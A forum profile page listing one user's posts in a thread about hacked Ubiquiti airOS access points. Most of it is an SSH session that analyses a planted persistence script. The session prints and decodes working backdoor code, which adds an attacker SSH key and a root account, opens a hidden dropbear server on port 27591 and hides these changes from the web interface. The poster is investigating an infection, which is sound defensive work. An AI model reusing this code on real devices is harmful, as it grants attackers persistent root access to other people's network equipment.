Перейти до

steelrat

Маглы
  • Всього повідомлень

    7
  • Приєднався

  • Останній візит

steelrat's Achievements

Пролетал Мимо

Пролетал Мимо (1/9)

0

Репутація

  1. steelrat

    Ubnt ломанули

    А управление закрыто?
  2. steelrat

    Ubnt ломанули

    Гм, а куда начинает размножаться? На клиентский компьютер? Вирю логичней оставлять тот же ссид, авось кто из соседей подконектится, тогда хоть будет куда разможаться. На базовых точно начинает размножаться. Т.е. пытается сканировать и заражать другие адреса...
  3. steelrat

    Ubnt ломанули

    Переводит абонентскую точку из режима клиента в режим мастера и меняет название ssid. Закрывает доступ к web-интерфейсу. И начинает размножаться. Остается только ssh.
  4. steelrat

    Ubnt ломанули

    ubnt@xxx.xxx.xxx.xxx's password: BusyBox v1.11.2 (2013-05-28 17:52:06 EEST) built-in shell (ash) Enter 'help' for a list of built-in commands. XM.v5.5.6# ls -lA -rw------- 1 ubnt admin 459 Apr 6 2012 dropbear_dss_host_key -rw------- 1 ubnt admin 427 Apr 6 2012 dropbear_rsa_host_key -rw------- 1 ubnt admin 20055 Dec 14 03:02 mf.tar -rwxr-xr-x 1 ubnt admin 1857 Dec 13 00:59 rc.prestart XM.v5.5.6# XM.v5.5.6# XM.v5.5.6# XM.v5.5.6# XM.v5.5.6# cat rc.prestart #!/bin/sh mkdir -p /var/bin cat << EOFEOFEOF | uudecode -o /var/bin/cgi - begin-base64 755 - IyEvYmluL3NoCmlmIFsgIiRIVFRQX0hPU1QiID0gImxvY2FsaG9zdC5sb2NhbG5ldCIgXTsgdGhl bgoJUEFUSD0vYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjokUEFUSAoJZWNobyAic3NoLXJz YSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFERkY5NmwreTNod0hGSDJXNmF5VHE2TG5t ZDFrTXFaRkI4L3Q0YVFvSmJIaXFsQitGaWhQL250c2gra3BSaHdDYTNlYUxENEFlZEJydnRvNnJM ZGpOTVJqTlV4TzY3YWpPL2VrdDVqTFpQR3YxVFVmeE42OVUrWnY5aDBkMlo4Tk5BOWplbVpIRVR1 R0IzOVlzN3hYYlR4RDZBSUw3WVRWN3BEM3cvdHdjQTIrbXVwWUJIRlBzMnVKUTZtNmZGNG0xODlH QWttMVRVdHdhNDFoZjAySVFIZTBhQnQwS0dNNlM5YjRzNC9CNmRtOTErYkl5Q3I3bjVDWW5BVW8z a0VzV20vaG1FOGNnUVFmeXpna21LRFFnWExRaE9DNDZMeUpZU1I1elpaNnJXN2s0UnppK0RtOW9w Ny9FbU94TnUwR3BKV1pvVVZSOUlITTlxMitlY1ZZSUYiIDI+L2Rldi9udWxsID4+IC9ldGMvZHJv cGJlYXIvYXV0aG9yaXplZF9rZXlzCgllY2hvICJhaXJ2aWV3OnVOT3dQWEd6eTlvZlk6MDowOkFp clZpZXcgbWFuYWdlcjovZXRjL3BlcnNpc3RlbnQ6L2Jpbi9zaCIgMj4vZGV2L251bGwgPj4gL2V0 Yy9wYXNzd2QKCglpZiBbICEgLWYgIi9ldGMvcGVyc2lzdGVudC9kcm9wYmVhcl9yc2FfaG9zdF9r ZXkiIF07IHRoZW4KCQlkcm9wYmVhcmtleSAtdCByc2EgLXMgMTAyNCAtZiAvZXRjL3BlcnNpc3Rl bnQvZHJvcGJlYXJfcnNhX2hvc3Rfa2V5ID4vZGV2L251bGwgMj4mMQoJZmkKCglkcm9wYmVhciAt YSAtciAvZXRjL3BlcnNpc3RlbnQvZHJvcGJlYXJfcnNhX2hvc3Rfa2V5IC1wIDI3NTkxIC1QIC9k ZXYvbnVsbCAyPi9kZXYvbnVsbAoJaXB0YWJsZXMgLUkgSU5QVVQgLXAgdGNwIC0tZHBvcnQgMjIg LWogQUNDRVBUCglpcHRhYmxlcyAtSSBJTlBVVCAtcCB0Y3AgLS1kcG9ydCAyNzU5MSAtaiBBQ0NF UFQKZmkKCmdyZXAgLXYgLWkgImF1dGhvcml6ZWRfa2V5cyIgfCBncmVwIC12IC1pICJcL2V0Y1wv cGFzc3dkIiB8IC9iaW4vY2dpICIke1NDUklQVF9GSUxFTkFNRX0iIHwgZ3JlcCAtRSAtdiAtaSAn c3BhbiBjbGFzcy4qKGxhYmVsfHZhbHVlLipyZWQpLiooY3VzdG9tIHNjcmlwdHM6fGVuYWJsZWQp Jwo= ==== EOFEOFEOF chmod 755 /var/bin/cgi 2>/dev/null sed 's/\/bin\/cgi/\/var\/bin\/cgi/' /usr/etc/lighttpd/lighttpd.conf >> /etc/lighttpd.conf sed -i '/^include "\/usr\/etc\/lighttpd\/lighttpd.conf"$/d' /etc/lighttpd.conf ------------------------- Попробуем заглянуть внутрь... XM.v5.5.6# cat << EOFEOFEOF | uudecode -o /tmp/cgi - > begin-base64 755 - > IyEvYmluL3NoCmlmIFsgIiRIVFRQX0hPU1QiID0gImxvY2FsaG9zdC5sb2NhbG5ldCIgXTsgdGhl > bgoJUEFUSD0vYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjokUEFUSAoJZWNobyAic3NoLXJz > YSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFERkY5NmwreTNod0hGSDJXNmF5VHE2TG5t > ZDFrTXFaRkI4L3Q0YVFvSmJIaXFsQitGaWhQL250c2gra3BSaHdDYTNlYUxENEFlZEJydnRvNnJM > ZGpOTVJqTlV4TzY3YWpPL2VrdDVqTFpQR3YxVFVmeE42OVUrWnY5aDBkMlo4Tk5BOWplbVpIRVR1 > R0IzOVlzN3hYYlR4RDZBSUw3WVRWN3BEM3cvdHdjQTIrbXVwWUJIRlBzMnVKUTZtNmZGNG0xODlH > QWttMVRVdHdhNDFoZjAySVFIZTBhQnQwS0dNNlM5YjRzNC9CNmRtOTErYkl5Q3I3bjVDWW5BVW8z > a0VzV20vaG1FOGNnUVFmeXpna21LRFFnWExRaE9DNDZMeUpZU1I1elpaNnJXN2s0UnppK0RtOW9w > Ny9FbU94TnUwR3BKV1pvVVZSOUlITTlxMitlY1ZZSUYiIDI+L2Rldi9udWxsID4+IC9ldGMvZHJv > cGJlYXIvYXV0aG9yaXplZF9rZXlzCgllY2hvICJhaXJ2aWV3OnVOT3dQWEd6eTlvZlk6MDowOkFp > clZpZXcgbWFuYWdlcjovZXRjL3BlcnNpc3RlbnQ6L2Jpbi9zaCIgMj4vZGV2L251bGwgPj4gL2V0 > Yy9wYXNzd2QKCglpZiBbICEgLWYgIi9ldGMvcGVyc2lzdGVudC9kcm9wYmVhcl9yc2FfaG9zdF9r > ZXkiIF07IHRoZW4KCQlkcm9wYmVhcmtleSAtdCByc2EgLXMgMTAyNCAtZiAvZXRjL3BlcnNpc3Rl > bnQvZHJvcGJlYXJfcnNhX2hvc3Rfa2V5ID4vZGV2L251bGwgMj4mMQoJZmkKCglkcm9wYmVhciAt > YSAtciAvZXRjL3BlcnNpc3RlbnQvZHJvcGJlYXJfcnNhX2hvc3Rfa2V5IC1wIDI3NTkxIC1QIC9k > ZXYvbnVsbCAyPi9kZXYvbnVsbAoJaXB0YWJsZXMgLUkgSU5QVVQgLXAgdGNwIC0tZHBvcnQgMjIg > LWogQUNDRVBUCglpcHRhYmxlcyAtSSBJTlBVVCAtcCB0Y3AgLS1kcG9ydCAyNzU5MSAtaiBBQ0NF > UFQKZmkKCmdyZXAgLXYgLWkgImF1dGhvcml6ZWRfa2V5cyIgfCBncmVwIC12IC1pICJcL2V0Y1wv > cGFzc3dkIiB8IC9iaW4vY2dpICIke1NDUklQVF9GSUxFTkFNRX0iIHwgZ3JlcCAtRSAtdiAtaSAn > c3BhbiBjbGFzcy4qKGxhYmVsfHZhbHVlLipyZWQpLiooY3VzdG9tIHNjcmlwdHM6fGVuYWJsZWQp > Jwo= > ==== > EOFEOFEOF XM.v5.5.6# ls -l /tmp/cgi -rwxr-xr-x 1 ubnt admin 1142 Dec 17 03:33 /tmp/cgi XM.v5.5.6# cat /tmp/cgi #!/bin/sh if [ "$HTTP_HOST" = "localhost.localnet" ]; then PATH=/bin:/sbin:/usr/bin:/usr/sbin:$PATH echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDFF96l+y3hwHFH2W6ayTq6Lnmd1kMqZFB8/t4aQoJbHiqlB+FihP/ntsh+kpRhwCa3eaLD4AedBrvto6rLdjNMRjNUxO67ajO/ekt5jLZPGv1TUfxN69U+Zv9h0d2Z8NNA9jemZHETuGB39Ys7xXbTxD6AIL7YTV7pD3w/twcA2+mupYBHFPs2uJQ6m6fF4m189GAkm1TUtwa41hf02IQHe0aBt0KGM6S9b4s4/B6dm91+bIyCr7n5CYnAUo3kEsWm/hmE8cgQQfyzgkmKDQgXLQhOC46LyJYSR5zZZ6rW7k4Rzi+Dm9op7/EmOxNu0GpJWZoUVR9IHM9q2+ecVYIF" 2>/dev/null >> /etc/dropbear/authorized_keys echo "airview:uNOwPXGzy9ofY:0:0:AirView manager:/etc/persistent:/bin/sh" 2>/dev/null >> /etc/passwd if [ ! -f "/etc/persistent/dropbear_rsa_host_key" ]; then dropbearkey -t rsa -s 1024 -f /etc/persistent/dropbear_rsa_host_key >/dev/null 2>&1 fi dropbear -a -r /etc/persistent/dropbear_rsa_host_key -p 27591 -P /dev/null 2>/dev/null iptables -I INPUT -p tcp --dport 22 -j ACCEPT iptables -I INPUT -p tcp --dport 27591 -j ACCEPT fi grep -v -i "authorized_keys" | grep -v -i "\/etc\/passwd" | /bin/cgi "${SCRIPT_FILENAME}" | grep -E -v -i 'span class.*(label|value.*red).*(custom scripts:|enabled)' XM.v5.5.6# netstat -nl Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN tcp 0 0 0.0.0.0:53 0.0.0.0:* LISTEN tcp 0 0 :::80 :::* LISTEN tcp 0 0 :::53 :::* LISTEN tcp 0 0 :::22 :::* LISTEN -------------- Однако не активен бэкдор... Тот который dropbear -a -r /etc/persistent/dropbear_rsa_host_key -p 27591 -P /dev/null 2>/dev/null Ибо if [ "$HTTP_HOST" = "localhost.localnet" ]; then Хм... Странный вирус... Или то не вирус? Походу активируется отсюда sed 's/\/bin\/cgi/\/var\/bin\/cgi/' /usr/etc/lighttpd/lighttpd.conf >> /etc/lighttpd.conf sed -i '/^include "\/usr\/etc\/lighttpd\/lighttpd.conf"$/d' /etc/lighttpd.conf Ну, собственно cgi.assign = ( "/ipscan.cgi" => "", "/signal.cgi" => "", "/status.cgi" => "", "/glogo.cgi" => "", "/status-new.cgi" => "", "/ifstats.cgi" => "", "/iflist.cgi" => "", "/air-view.cgi" => "", ".jnlp" => "/var/bin/cgi", ".cgi" => "/var/bin/cgi", ".sh" => "/bin/sh" ) host:~ # wget http://xxx.xxx.xxx.xxx/.cgi --2016-05-22 22:13:40-- http://xxx.xxx.xxx.xxx/.cgi Connecting to xxx.xxx.xxx.xxx:80... connected. HTTP request sent, awaiting response... 302 Found Location: /cookiechecker?uri=/.cgi [following] --2016-05-22 22:13:40-- http://xxx.xxx.xxx.xxx/cookiechecker?uri=/.cgi Reusing existing connection to xxx.xxx.xxx.xxx:80. HTTP request sent, awaiting response... 302 Found Location: /.cgi [following] --2016-05-22 22:13:40-- http://xxx.xxx.xxx.xxx/.cgi Reusing existing connection to xxx.xxx.xxx.xxx:80. HTTP request sent, awaiting response... 302 Found Location: /login.cgi?uri=/.cgi [following] --2016-05-22 22:13:40-- http://xxx.xxx.xxx.xxx/login.cgi?uri=/.cgi Reusing existing connection to xxx.xxx.xxx.xxx:80. HTTP request sent, awaiting response... 200 OK Length: unspecified [text/html] Saving to: ‘.cgi’ .cgi [ <=> ] 2.85K --.-KB/s in 0.001s 2016-05-22 22:13:40 (1.92 MB/s) - ‘.cgi’ saved [2916] resolv:~ # cat .cgi <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Login</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta http-equiv="Cache-Control" content="no-cache"> <link rel="shortcut icon" href="/130528.1754/favicon.ico" > <link href="/130528.1754/login.css" rel="stylesheet" type="text/css"> <link href="/130528.1754/style.css" rel="stylesheet" type="text/css"> <script type="text/javascript" src="/130528.1754/js/jquery.js"></script> <script type="text/javascript" src="/130528.1754/util.js"></script> <script type="text/javascript" src="/130528.1754/index.js"></script> <script type="text/javascript" language="javascript"> //<!-- var globals = { first_login : false, postback : false, fixed : false, country : "" }; function onLangChange() { $("#lang_changed").val("yes"); $("#loginform").submit(); } function validateForm() { if ($("#lang_changed").val() == "yes") return true; if ($("#country").val() == "0") { $("#errmsg").text("Please select your country."); return false; } if (!$("#agreed").is(":checked")) { $("#errmsg").html("To use this product, you must agree to<br/>terms of use."); return false; } return true; } $(document).ready(function() { $("#username").focus(); cache_images([ 'main_top.png', 'main.png', 'link.png', 'net.png', '4dv.png', 'srv.png', 'system.png', 'border.gif', 'spectr.gif']); if (globals.first_login) { $("#ui_language").change(onLangChange); $("#loginform").submit(validateForm); if (!globals.postback && !globals.fixed) $("#country").val(0); else $("#country").val(globals.country); } }); //--> </script> </head> <body> <table border="0" cellpadding="0" cellspacing="0" align="center" class="loginsubtable"> <form enctype="multipart/form-data" id="loginform" method="post" action="/login.cgi"> <tr> <td valign="top"><img src="/130528.1754/images/airos_logo.png"></td> <td class="loginsep"> <input type="hidden" name="uri" id="uri" value="/.cgi" /> <table border="0" cellpadding="0" cellspacing="0" class="logintable" align="center"> <tr> <td colspan="2" align="center"> <div id="errmsg" class="error"> </div> </td> </tr> <tr> <td colspan="2"> </td> </tr> <tr> <td><label for="username">Username:</label></td> <td><input type="text" name="username" id="username" /></td> </tr> <tr> <td><label for="password">Password:</label></td> <td><input type="password" name="password" id="password" maxlength="8"/></td> </tr> <tr> <td colspan="2"> </td> </tr> </table> </td> </tr> <tr> <td> </td> <td class="submit" align="right"> <input type="submit" value="Login" /> </td> </tr> </form> </table> </body> </html> Т.е. запаролено... Без пароля бэкдор не запустить...
  5. steelrat

    Ubnt ломанули

    Порт от игровых серваков... :-)
  6. steelrat

    Ubnt ломанули

    Взлом точек продолжается... новая ресия вирусни --------------- #!/bin/sh if [ "$HTTP_HOST" = "localhost.localnet" ]; then PATH=/bin:/sbin:/usr/bin:/usr/sbin:$PATH echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDFF96l+y3hwHFH2W6ayTq6Lnmd1kMqZFB8/t4aQoJbHiqlB+FihP/ntsh+kpRhwCa3eaLD4AedBrvto6rLdjNMRjNUxO67ajO/ekt5jLZPGv1TUfxN69U+Zv9h0d2Z8NNA9jemZHETu GB39Ys7xXbTxD6AIL7YTV7pD3w/twcA2+mupYBHFPs2uJQ6m6fF4m189GAkm1TUtwa41hf02IQHe0aBt0KGM6S9b4s4/B6dm91+bIyCr7n5CYnAUo3kEsWm/hmE8cgQQfyzgkmKDQgXLQhOC46LyJYSR5zZZ6rW7k4Rzi+Dm9op7/EmOxNu0GpJWZoUVR9I HM9q2+ecVYIF" 2>/dev/null >> /etc/dropbear/authorized_keys echo "airview:uNOwPXGzy9ofY:0:0:AirView manager:/etc/persistent:/bin/sh" 2>/dev/null >> /etc/passwd if [ ! -f "/etc/persistent/dropbear_rsa_host_key" ]; then dropbearkey -t rsa -s 1024 -f /etc/persistent/dropbear_rsa_host_key >/dev/null 2>&1 fi dropbear -a -r /etc/persistent/dropbear_rsa_host_key -p 27591 -P /dev/null 2>/dev/null iptables -I INPUT -p tcp --dport 22 -j ACCEPT iptables -I INPUT -p tcp --dport 27591 -j ACCEPT fi grep -v -i "authorized_keys" | grep -v -i "\/etc\/passwd" | /bin/cgi "${SCRIPT_FILENAME}" | grep -E -v -i 'span class.*(label|value.*red).*(custom scripts:|enabled)' ----------------- Если я ничего не путаю, то это открытие бэкдора на порту 27591. Можно посканировать... dropbear -a -r /etc/persistent/dropbear_rsa_host_key -p 27591 -P /dev/null 2>/dev/null
  7. steelrat

    Ubnt ломанули

    Administrator и пароль какой-то...
×
×
  • Створити нове...